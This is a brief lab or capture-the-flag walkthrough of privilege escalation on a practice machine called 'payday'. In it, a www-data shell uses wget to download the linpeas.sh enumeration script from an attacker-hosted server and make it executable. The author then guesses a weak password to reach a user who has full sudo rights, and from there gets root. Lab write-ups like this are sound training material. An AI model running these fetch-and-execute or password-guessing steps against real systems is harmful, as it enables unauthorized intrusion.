search

privilege escalaltion [basic-pass]

www-data@payday:/tmp/temp$ wget http://192.168.45.234:8000/linpeas.sh
wget http://192.168.45.234:8000/linpeas.sh
--10:39:13--  http://192.168.45.234:8000/linpeas.sh
           => `linpeas.sh'
Connecting to 192.168.45.234:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827,739 (808K) [text/x-sh]

100%[====================================>] 827,739        1.31M/s

10:39:14 (1.30 MB/s) - `linpeas.sh' saved [827739/827739]

www-data@payday:/tmp/temp$ chmod a+x linpeas.sh

I foudn that there is .cap file which wireshare file of capture data.

I will first transfer this file to tmp and then to kali linux.

Start the python server on victim machine.

On kali linux downlaod it and open it in wireshark.

Examine the result no result.

hashtag
Trying basic password

Let's try basic password like kali kali.

Great !!

Above password worked.

Now I will enumerate from this user for privilege escalation.

patrick has permission to run all the commands.

We got the root shell.

Previoushttp [initial Access]Nextlocal.txt & proof.txt

Last updated

Was this helpful?